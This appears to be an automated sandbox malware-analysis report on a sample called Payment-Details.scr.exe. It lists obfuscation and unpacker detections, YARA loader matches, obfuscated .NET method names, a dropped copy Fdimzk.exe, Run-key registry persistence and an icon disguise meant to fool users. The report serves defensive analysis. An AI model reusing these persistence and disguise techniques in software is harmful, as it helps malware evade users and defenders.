                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003797000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, cEMTeSTJCQwtXJPNZNI.cs.Net Code: Type.GetTypeFromHandle(UoJbCPMsMYyxPcP56ut.tonp9NsT8A(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(UoJbCPMsMYyxPcP56ut.tonp9NsT8A(16777259)),Type.GetTypeFromHandle(UoJbCPMsMYyxPcP56ut.tonp9NsT8A(16777263))})
                    .NET source code contains potential unpacker
                    Source: Payment-Details.scr.exe, Fdcbogjlxm.cs.Net Code: Klooqgfjmbl System.Reflection.Assembly.Load(byte[])
                    Source: Fdimzk.exe.0.dr, Fdcbogjlxm.cs.Net Code: Klooqgfjmbl System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.7160000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.47efcb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1692829091.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2013699239.000000000273C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_019F186C pushfd ; retf 0_2_019F186D
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636C6BE push ds; ret 0_2_0636C6E1
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636C6A6 pushfd ; ret 0_2_0636C6BD
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063607A1 push es; ret 0_2_063607CC
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636B045 push ebp; retf 0_2_0636B053
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_06367A1E push es; retf 0_2_06367AB0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_06367A7E push es; retf 0_2_06367AB0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070ED410 push FFFFFF8Bh; iretd 0_2_070ED417
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070ED29A push FFFFFF8Bh; ret 0_2_070ED29E
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070ED2D4 push FFFFFF8Bh; ret 0_2_070ED2D8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070ED2E8 push FFFFFF8Bh; iretd 0_2_070ED2EF
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723A3E2 push eax; iretd 0_2_0723A3ED
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_07232E6E pushad ; iretd 0_2_07232E71
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_07230006 pushad ; retf 0_2_0723003D
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723B8D3 push cs; ret 0_2_0723B8DF
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0725BA01 pushad ; iretd 0_2_0725BA0D
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_072C051E push ds; ret 0_2_072C051F
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_072C36CD push cs; retf 0_2_072C36CE
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_072C3ED0 push es; ret 0_2_072C3ED6
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_00A0186C pushfd ; retf 4_2_00A0186D
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0584C6BC pushfd ; ret 4_2_0584C6BD
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673ECB9 push 04418B06h; ret 4_2_0673ECB3
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673ECA1 push 04418B06h; ret 4_2_0673ECB3
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673731B push es; retf 4_2_0673731C
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068842E8 push 04418B06h; ret 4_2_068844C3
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06882E6E pushad ; iretd 4_2_06882E71
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0688B8C9 push cs; ret 4_2_0688B8DF
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06880007 pushad ; retf 4_2_0688003D
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06884152 push 04418B06h; ret 4_2_06884183
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068A5E82 push es; iretd 4_2_068A5E94
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068AB6D0 push es; ret 4_2_068AB780
                    Source: 0.2.Payment-Details.scr.exe.6f40000.10.raw.unpack, UCdPmjB2kRcEAgpWwas.csHigh entropy of concatenated method names: 'B8oBx992ys', 'qiIj1sL4KKRaNe011pf', 'Y7rI0qL1RZ8VotKLdbJ', 'maUOXVLp38k3UVZqjDF', 'X1Hla6LoM5rw0sVrKAk', 'i3AbpmLmPvS6ZJcCZDG'
                    Source: 0.2.Payment-Details.scr.exe.6f40000.10.raw.unpack, l8E6ukR0TSueoKaFZIh.csHigh entropy of concatenated method names: 'BG2RLnhDaY', 'QVFaicqwnx9kXCliwSR', 'XNCNk8qoJYkH3QVN7ur', 'deZu5jqv33Fo5BtHsmQ', 'JYr3bSqEKbJWM64Hhap', 'Iyf4jPqaXrCKt43qIbp', 'FlBH4sqq2KDr5sPHbLI'
                    Source: 0.2.Payment-Details.scr.exe.6f40000.10.raw.unpack, tv46RrRIboVEkiIeNjQ.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'zGHRFUoYrH', 'NtProtectVirtualMemory', 'vFE4DXq0jmhXPhUMAXP', 'dAKnQYqP0gy2aQHKXQB', 'AsGBrIqxH3aOG5u0H4q', 'dtje9qqsx6iX6viWAnp'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, cEMTeSTJCQwtXJPNZNI.csHigh entropy of concatenated method names: 'VPkTMhv0iMV92h34gL8', 'A5yIdmvPRVq4dPkgIZ0', 'TOyMfxAh4a', 'CXlTaav8deB3jdH1ldr', 'XkxjhsvDPsiHry6P12Q', 'cfA6mJvLQQUYcAE3htJ', 'prv70OvaDxipfyMUo6T', 'v2qkUZvqaySbwsEYuuK', 'dqmtYtvNyLogisOKvQq', 'LT6M93v63BRmTXJ00Zo'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'VZJMVIZ4UVht05XBN1w'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, lPvg7dPmHaITQu4WEf.csHigh entropy of concatenated method names: 'V4aJNA5lP', 'J0NiTC6Og', 'nJmDubkwZ', 'NQE8MHU9S', 'W0PgUb8Gd4MMKq11Gjf', 'dTZ68M8OtE1IxwWa2FR', 'pSeq9q835Z8YtMfNFHp', 'wB4vv68UbGDqfRxfAYE', 'EOZA9V8uPra1H2STEqe', 'y2bh8H8X8Js6fjnVAb9'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, Tx89ah7CcyZTpPO7oL.csHigh entropy of concatenated method names: 'DuRQ1SPIM', 'tuuFNxkeH', 'BVt2Mgu4W', 'ItLniOAKA', 'KbGINVoSq', 'X6xcKW81grcJo4FHNuH', 'x8ggtY8pfRkVYA2OXCR', 'A2BEbA89LO7Q9nANH3D', 'NIRfIc8c2Z9PsbEGKQp', 'lQqiaf8ABV1DnDQ3fC6'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, gHCiRkBDj5WxHlYdkmH.csHigh entropy of concatenated method names: 'IlhBaQN1nA', 'nY1BqlmbmT', 'vPlBN67PCs', 'ORuMpga0H7Yws41KIQt', 'oF0AgxaPbmQRJ2qJ1H0', 'rygDbPahF8UrisFYUIa', 'peDAafaJ0WM1jWnqqgE', 'oMk0OqaxqpjYXtxb4m2', 'pk6bO6as7nIaIXMoGEA', 'IlJfTJaiqiEwUuMcgKd'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, YLlsu1MiIcmhJea4loV.csHigh entropy of concatenated method names: 'UqLMwv6bMH', 'Wd1Moq6V02', 'KnpMmFSjAv', 'z9vM4CseC2', 'x0nM1ZEL74', 'jjdMp3Bfjj', 'dLcM9vaWn6', 'OnsMchW8eK', 'uu6MAZuDHX', 'KpXMWuYTjm'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, OmSauhVCkp6kLbh944E.csHigh entropy of concatenated method names: 'QGxTft2mJt', 'I6lVWNHhn1Ue41LtGr6', 'Yc1BvwHJmH7CNprIqIQ', 'lJ1Go1HiyZAowyC59be', 'Y3sx81H8Dd5JaGNbO1d', 'dkvkftHDcXyqpqKcPwf', 'yQLUwLH08CBelnWbdb0', 'dNycGmHP60PT0b3QcMi'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, JcdubCBbla8EG7qhjLs.csHigh entropy of concatenated method names: 'yPDBzgtlO4', 'TBZRg8UHyu', 'PrPRYajJxO', 'RkZRBLYvX1', 'kSgRR0bYiH', 'YU4RdGOOcL', 'zRcRyJ7dLP', 'FMtRV08SKl', 'a4dRTh59Va', 'eXBRSJ09Kl'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, VC0omlMlMmUW6BGAEnr.csHigh entropy of concatenated method names: 'vEA2KKRaAu', 'Ewp2IjMkPB', 'cbK2Q5Cc1D', 'ihY2FNLawR', 'Um025OMcBw', 'LBY22iOIaP', 'hU82nmJCdw', 'jqa77TCvGq', 'JPO2x99PHX', 'x7R2sk0R26'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, Tq8ePABsamb8CvWWaOo.csHigh entropy of concatenated method names: 'v4EBPNK8ts', 'rDlBhsiBlk', 'jv5BJX0DMe', 'G2qBiINxNB', 'o6SB8FZ87B', 'g3kefhLWMVP6wviXwkL', 'WdoRfgLljKgC8OFyKtL', 'eDItuSLtjFAu25kYd6w', 'djK79VLcDbH75a6gcD7', 'WSLYnsLAYfb1J87bZdv'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, UCdPmjB2kRcEAgpWwas.csHigh entropy of concatenated method names: 'B8oBx992ys', 'qiIj1sL4KKRaNe011pf', 'Y7rI0qL1RZ8VotKLdbJ', 'maUOXVLp38k3UVZqjDF', 'X1Hla6LoM5rw0sVrKAk', 'i3AbpmLmPvS6ZJcCZDG'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, vkp0FiT7675Kw7rIiSS.csHigh entropy of concatenated method names: 'SkmTIQdC3p', 'm4nTQmDukA', 'MZvahXZMDsTaBkFL85S', 'By10XBZ7NWesxBDpG0J', 'VnX3g3ZKBxsKBZN12kw', 'VdZXEuZTg5VVkrOsNvL', 'j9EH7wZSfU7YljE0mJW', 'Kwq5ERZI5TlsOROPuUZ', 'Uf30OXZQiCVINr6ibkn', 'OZlw20ZFT5KWfJpIfHm'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, iBB2T7VLIuS4oK2CDs0.csHigh entropy of concatenated method names: 'IMvV6Kvnak', 'l1XVHBeERV', 'rpsVqW54vm', 'Mn5VNgSD41', 'fQStvB6EExCSI8MXbbo', 'I9m4Q56wKixM3h9Vyiy', 'nYMB0L6o5jyMgjpjax2', 'RjuExo6mJI2KGHMcBv0', 'yWd79H6457k3bSrvYuU', 'SVll0y6ZTL3viTsUg8h'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, FwNDDFViEq8tKvP5vq2.csHigh entropy of concatenated method names: 'bxeVDoEl7k', 'r6rt686ihWvWVPOlA3J', 'yrPgVu68P2KG8rtOBJp', 'ydwpyU6DKh7aAxt8Xgf', 'mUphGi6LmakAHLM1tkQ', 'iDG6636ano3o6YD1AxN', 'BHepTR6qPfnp3Y9xtUI', 'CmkPMT6N14MqoITACtA', 'gssgNW66GIiAKoK8pAN', 'zNgrRT6h802Q7OyHlSO'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, DrjwUZBIFiH4wd8kJUS.csHigh entropy of concatenated method names: 'o61BFEq0q8', 't5UB5AwnIQ', 'PWELhpLNb2VldUbYcSK', 'dGXZ2RLaCj4hiVZpuI6', 'W97sSkLqqlMvXb3BrtY', 'utYxIeL62710CnonJs9', 'bjZk04LHhB1ol6oZfdL', 'zkRVU4LZxXpf7jKW4hL', 'Vg7G26LvVHASOU2L4Ik', 'pvtZmULE3xK8slyPJCA'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, Hnkaj5TRbdHTp8s93nh.csHigh entropy of concatenated method names: 'ADyTyJsMsZ', 'WXoTVmSFwi', 'qGfTCYHERFRJXOW7Bld', 'DKaMWwHwwZkK1wGOYUC', 'NNHkCIHoXQrDnJmckQx', 'xiVGPdHZkNo7eglJZRt', 'ymdwWSHv5gMW1LNpr5k', 'rrEVv1Hmx8dpJog7y2F', 'lNo5vjH4UqXpCpykQmn', 'L53X79H1P1buL9D5Kv7'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, ihJuqLr5rqPgN94MZNn.csHigh entropy of concatenated method names: 'f3CrnRCWwg', 'QojrI0DJhlGy4yGTydm', 'Jxe4xJDiyyEbZTDTsT2', 'BkrOSFD8gt3xvs2uDTn', 'lpveuIDDV9M0ddwP63e', 'ABjIlgDLu7RNqXimqsu', 'mM51EfDaaUrOKqjF3JD', 'NQKqooDqHZUojfxRnvN', 'gg1nX3DNMbIJ0JqBckp', 'cbb83VD6h7RcSo7SyG2'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, l8E6ukR0TSueoKaFZIh.csHigh entropy of concatenated method names: 'BG2RLnhDaY', 'QVFaicqwnx9kXCliwSR', 'XNCNk8qoJYkH3QVN7ur', 'deZu5jqv33Fo5BtHsmQ', 'JYr3bSqEKbJWM64Hhap', 'Iyf4jPqaXrCKt43qIbp', 'FlBH4sqq2KDr5sPHbLI'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, kL7fdgTsmQPLIx7UR1y.csHigh entropy of concatenated method names: 'U7Tp4IgeD9', 'Nwqf2wvSIrDWvIMXTAI', 'O7Skt7vM6cCdx4ctTNR', 'Dq5OLYv7S3x5UQyeE5U', 'Lu7nbdvKTEqNHiCDBgc', 'nohPfpvI3m0CTyU8I06', 'V6fCuEvVAOgR2kNXbRJ', 'KvYDO5vTBYOVNTxCrVw', 'q8sIalvQtK3xXfmtM7u', 'RR096mvFkonv3CEapP2'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, X49H84TT2MbBv32Ld1W.csHigh entropy of concatenated method names: 'TNJTM9BqLL', 'Y66TxaHzqX7i2xJaPBw', 'W1IXKJZf2vYOXQ2UgCC', 'vBiPkCZgRXhLZLHOdGG', 'T7LcqsZruf8S6qZo8lu', 'qLBbQ6ZYXl90akeE1GE', 'zvdH1bZjSWOeemI6KT0', 'uaH5GkZBvT8b1RjTf2e', 'grFDLiZR1OyKU1GNSD4', 'g3qwM9Zd9eNAXpYveAO'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, zqm3cUV0rI9FDBHqcpT.csHigh entropy of concatenated method names: 'mhZVhCAReM', 'devVJkEmfr', 'iIivccNub7QCrmjfMIR', 'Cwbpa2NXYGPWcPpJjHW', 'yFti5cNeNkjErm8JBj3', 'mk55jsNkCS7p4eftFIh', 'aIfdd7NbxeinfoAtDAH', 'h9E8rxNCtgPdD8AmbF6', 'bJybwONz5dZmoGhh8jj', 'YaLpv76fLKFaeb9hxCi'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, jK0oo2VKF7rdJ0ilXfw.csHigh entropy of concatenated method names: 'PX3VQUss8o', 'QNHGHkNZLXDgE6cQO2b', 'FmY0C1Nvl391my2jdfm', 'IZ3UsRNEoJksJeIuZg5', 'kDWN9TNwabyI1Bbbbk2', 'AQTjuVNoI3aWB80jkj3', 'fmUBN7NmEAfQksV551x', 'xdVXpFN4RH1fydTSxqx', 'fOepdXN6GIQRk9CsaSW', 'JyJJmCNHovrEGNIfuUs'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, tv46RrRIboVEkiIeNjQ.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'zGHRFUoYrH', 'NtProtectVirtualMemory', 'vFE4DXq0jmhXPhUMAXP', 'dAKnQYqP0gy2aQHKXQB', 'AsGBrIqxH3aOG5u0H4q', 'dtje9qqsx6iX6viWAnp'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, o30rm0TFvCgutXkSwea.csHigh entropy of concatenated method names: 'UonT2xfMgd', 'Bd8BOxZshYkAFDryBf1', 'Y1LdSIZ0wZsTlwOE1kt', 'ztYbSRZPcTVsJufvLpm', 'lLiYnMZhfgl5yCIxAHO', 'jqqiHGZJHs97wA7lXPH', 'iCW3TFZnbIRMwRcGgbF', 'iuBAPSZxHgY76VJ7LYj'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, nEEk2YVEX42BJFmBjD4.csHigh entropy of concatenated method names: 'p09Vou9Jfb', 'naUwEV6A9ylg7WNT87L', 'SFblDh6WisKILnoexki', 'RVqXn36lo3sU3uoVBAL', 'TeoBRc6tbSwy49sUljD', 'bMvFZ26GHWGmcfM1wqc', 'WxvV4c6OaCkXDLDXUg5', 'q3Aobk63hnOoCAQ7Z3d', 'JEhM6Q6Ut7fWPZY0Rvp', 'aktP3o6uIs7ZVvNkhIr'
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeFile created: C:\Users\user\AppData\Roaming\Fdimzk.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FdimzkJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FdimzkJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Icon mismatch, binary includes an icon from a different legit application in order to fool users
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (59).png
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
